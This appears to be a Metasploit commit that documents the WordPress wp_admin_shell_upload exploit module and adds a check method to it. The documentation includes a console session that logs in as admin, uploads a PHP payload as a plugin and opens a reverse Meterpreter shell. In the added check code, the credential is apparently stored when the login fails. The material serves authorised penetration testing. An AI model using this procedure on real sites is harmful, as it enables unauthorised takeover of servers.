Land rapid7#8274, Wordpress admin upload check

Author: jmartin-tech

documentation/modules/exploit/unix/webapp/wp_admin_shell_upload.md

@@ -0,0 +1,51 @@
+## Vulnerable Application
+
+This module takes an administrator username and password, logs into the
+admin panel, and uploads a payload packaged as a WordPress plugin.
+Becuase this is authenticated code execution by design, it should work
+on all versions of WordPress.
+
+### Vulnerable Application Installation
+
+You can get WordPress from [https://wordpress.org/download/](https://wordpress.org/download/)
+or from some Linux package managers. [Debian maintains an installation
+guide](https://wiki.debian.org/WordPress) that also works on Ubuntu.
+Note that in a default install of WP from apt, the plugins directory is
+owned by root, so unless you chown it to the web user, this module will
+not work. Doing so is common in real-world deployments to allow
+legitimate administrators to install plugins, so it is not unreasonable
+for your own installation.
+
+
+## Verification steps
+
+```
+msf > use exploit/unix/webapp/wp_admin_shell_upload
+msf exploit(wp_admin_shell_upload) > set USERNAME admin
+USERNAME => admin
+msf exploit(wp_admin_shell_upload) > set PASSWORD password
+PASSWORD => password
+msf exploit(wp_admin_shell_upload) > set TARGETURI /wp/
+TARGETURI => /wp/
+msf exploit(wp_admin_shell_upload) > run
+
+[*] Started reverse TCP handler on 0.0.0.0:4444
+[*] Authenticating with WordPress using admin:password...
+[+] Login successful
+[+] Authenticated with WordPress
+[*] Preparing payload...
+[*] Uploading payload...
+[*] Acquired a plugin upload nonce: afa507398f
+[*] Uploaded plugin iHNhrYLmGR
+[*] Executing the payload at /wp/wp-content/plugins/iHNhrYLmGR/DcrpFXPOCG.php...
+[*] Sending stage (33986 bytes) to 192.168.100.131
+[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.131:40039) at 2017-04-21 11:36:33 -0500
+[+] Deleted DcrpFXPOCG.php
+[+] Deleted iHNhrYLmGR.php
+
+meterpreter > pwd
+/var/lib/wordpress/wp-content/plugins/iHNhrYLmGR
+meterpreter >
+```
+
+

modules/exploits/unix/webapp/wp_admin_shell_upload.rb

@@ -39,6 +39,16 @@ def initialize(info = {})
       ])
   end
 
+  def check
+    cookie = wordpress_login(username, password)
+    if cookie.nil?
+      store_valid_credential(user: username, private: password, proof: cookie)
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
+  end
+
   def username
     datastore['USERNAME']
   end